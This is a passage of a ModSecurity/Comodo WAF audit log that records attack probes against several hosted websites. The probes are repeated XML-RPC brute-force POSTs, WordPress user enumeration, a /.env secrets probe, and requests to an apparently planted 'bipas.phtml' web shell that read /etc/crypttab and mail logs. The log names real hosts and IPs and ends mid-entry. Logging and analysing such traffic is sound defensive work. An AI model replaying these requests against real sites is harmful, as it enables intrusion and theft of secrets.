--205e6647-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --205e6647-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aE4LOMH4SeX80EzN5eWQ6AAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749945144632944 987300 (- - -) Stopwatch2: 1749945144632944 987300; combined=1789, p1=266, p2=1426, p3=0, p4=0, p5=97, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --205e6647-Z-- --cd446f3c-A-- [15/Jun/2025:05:30:09.187646 +0530] aE4NBz9o8tFLnaQ0S_4uYQAAAAQ 167.250.235.41 51352 127.0.0.1 7081 --cd446f3c-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cd446f3c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cd446f3c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4NBz9o8tFLnaQ0S_4uYQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749945607941837 1245878 (- - -) Stopwatch2: 1749945607941837 1245878; combined=3207, p1=508, p2=2254, p3=72, p4=55, p5=201, sr=132, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd446f3c-Z-- --12a5b00e-A-- [15/Jun/2025:05:31:51.037786 +0530] aE4NbRkoa9Lad8nP7KOAPgAAABA 167.250.235.41 52486 127.0.0.1 7081 --12a5b00e-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --12a5b00e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --12a5b00e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4NbRkoa9Lad8nP7KOAPgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749945709945579 1092271 (- - -) Stopwatch2: 1749945709945579 1092271; combined=2443, p1=377, p2=1676, p3=64, p4=49, p5=177, sr=109, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --12a5b00e-Z-- --2705ea09-A-- [15/Jun/2025:05:33:18.852457 +0530] aE4NxSeXHcLENIHhuFcsEwAAAAU 167.250.235.41 54464 127.0.0.1 7081 --2705ea09-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2705ea09-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2705ea09-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4NxSeXHcLENIHhuFcsEwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749945797821548 1031011 (- - -) Stopwatch2: 1749945797821548 1031011; combined=2429, p1=350, p2=1544, p3=82, p4=62, p5=244, sr=95, sw=147, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2705ea09-Z-- --af6d0e0e-A-- [15/Jun/2025:05:33:44.627710 +0530] aE4N4FIoq-7Cj_2-ZLTOiQAAAAA 104.23.166.163 53756 127.0.0.1 7081 --af6d0e0e-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.getcalley.com X-Real-IP: 104.23.166.163 X-Forwarded-For: 196.251.70.66 Connection: close cf-ray: 94fdce59fd915925-AMS cf-ipcountry: NL user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 accept-encoding: gzip, br x-forwarded-proto: https cdn-loop: cloudflare; loops=1 cf-visitor: {"scheme":"https"} cf-connecting-ip: 196.251.70.66 cookie: wordpress_test_cookie=WP%20Cookie%20check --af6d0e0e-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.getcalley.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Content-Encoding: gzip Content-Length: 124 Connection: close Content-Type: application/json; charset=UTF-8 --af6d0e0e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE4N4FIoq-7Cj_2-ZLTOiQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749945824379894 247905 (- - -) Stopwatch2: 1749945824379894 247905; combined=1983, p1=335, p2=1564, p3=0, p4=0, p5=84, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --af6d0e0e-Z-- --d914a412-A-- [15/Jun/2025:05:34:46.575377 +0530] aE4OHfBViRrxRfhQ2sne7AAAAAE 167.250.235.41 52956 127.0.0.1 7081 --d914a412-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 676 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d914a412-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d914a412-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4OHfBViRrxRfhQ2sne7AAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749945885592110 983333 (- - -) Stopwatch2: 1749945885592110 983333; combined=2099, p1=393, p2=1343, p3=57, p4=47, p5=164, sr=130, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d914a412-Z-- --12234e70-A-- [15/Jun/2025:05:36:00.414475 +0530] aE4OaLdgU2RqPO-R9-XQvgAAAA0 52.3.155.146 58974 127.0.0.1 7081 --12234e70-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/crypttab HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.3.155.146 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --12234e70-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2976 Connection: close Content-Type: text/html; charset=UTF-8 --12234e70-H-- Message: Warning. Matched phrase "etc/crypttab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/crypttab found within ARGS:viewfile: /etc/crypttab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/crypttab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/crypttab found within ARGS:viewfile: /etc/crypttab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE4OaLdgU2RqPO-R9-XQvgAAAA0"] Apache-Handler: application/x-httpd-php Stopwatch: 1749945960409790 4739 (- - -) Stopwatch2: 1749945960409790 4739; combined=2357, p1=356, p2=1879, p3=39, p4=29, p5=54, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --12234e70-Z-- --b0687d3c-A-- [15/Jun/2025:05:36:21.933093 +0530] aE4OfMQgjKnP_-nTjoBlyQAAAAM 167.250.235.41 35728 127.0.0.1 7081 --b0687d3c-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 678 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --b0687d3c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b0687d3c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4OfMQgjKnP_-nTjoBlyQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749945980959418 973759 (- - -) Stopwatch2: 1749945980959418 973759; combined=2794, p1=499, p2=1823, p3=87, p4=60, p5=204, sr=127, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b0687d3c-Z-- --85575c36-A-- [15/Jun/2025:05:37:15.619229 +0530] aE4Os_BViRrxRfhQ2snfFAAAAAE 3.218.103.254 43562 127.0.0.1 7081 --85575c36-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/maillog.processed.1.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.218.103.254 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --85575c36-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --85575c36-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE4Os_BViRrxRfhQ2snfFAAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749946035615462 3819 (- - -) Stopwatch2: 1749946035615462 3819; combined=1976, p1=341, p2=1511, p3=34, p4=30, p5=59, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --85575c36-Z-- --89b4990b-A-- [15/Jun/2025:05:37:47.303260 +0530] aE4O0sH4SeX80EzN5eWSAAAAAAs 167.250.235.41 55852 127.0.0.1 7081 --89b4990b-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --89b4990b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --89b4990b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4O0sH4SeX80EzN5eWSAAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946066275822 1027504 (- - -) Stopwatch2: 1749946066275822 1027504; combined=2381, p1=369, p2=1631, p3=67, p4=47, p5=168, sr=105, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --89b4990b-Z-- --131e5059-A-- [15/Jun/2025:05:37:53.335182 +0530] aE4O17dgU2RqPO-R9-XQ3wAAAA0 78.153.140.222 44080 127.0.0.1 7081 --131e5059-B-- GET /.env HTTP/1.0 Host: www.home9ine.com X-Real-IP: 78.153.140.222 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061202 Firefox/2.0 --131e5059-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=0750da27f5c0db893b034abaa27ea7621749946072; expires=Sun, 15 Jun 2025 01:07:52 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --131e5059-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.home9ine.com"] [uri "/.env"] [unique_id "aE4O17dgU2RqPO-R9-XQ3wAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946071658777 1676473 (- - -) Stopwatch2: 1749946071658777 1676473; combined=1802, p1=400, p2=1296, p3=0, p4=0, p5=106, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --131e5059-Z-- --31c6cb24-A-- [15/Jun/2025:05:39:14.729144 +0530] aE4PKWydX8vZg3SgqNzHpQAAAAI 167.250.235.41 39462 127.0.0.1 7081 --31c6cb24-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 680 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --31c6cb24-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --31c6cb24-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4PKWydX8vZg3SgqNzHpQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946153735003 994226 (- - -) Stopwatch2: 1749946153735003 994226; combined=2760, p1=503, p2=1847, p3=62, p4=47, p5=190, sr=150, sw=111, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --31c6cb24-Z-- --ba0cfe7d-A-- [15/Jun/2025:05:40:52.456139 +0530] aE4Pi_BViRrxRfhQ2snfUQAAAAE 167.250.235.41 37046 127.0.0.1 7081 --ba0cfe7d-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 681 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ba0cfe7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ba0cfe7d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4Pi_BViRrxRfhQ2snfUQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946251471661 984564 (- - -) Stopwatch2: 1749946251471661 984564; combined=2532, p1=348, p2=1644, p3=76, p4=67, p5=243, sr=95, sw=154, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ba0cfe7d-Z-- --1ab04061-A-- [15/Jun/2025:05:42:30.848069 +0530] aE4P7cH4SeX80EzN5eWSVQAAAAs 167.250.235.41 47326 127.0.0.1 7081 --1ab04061-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1ab04061-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1ab04061-H-- Message: Warning. Operator EQ matched 0 at IP. [file 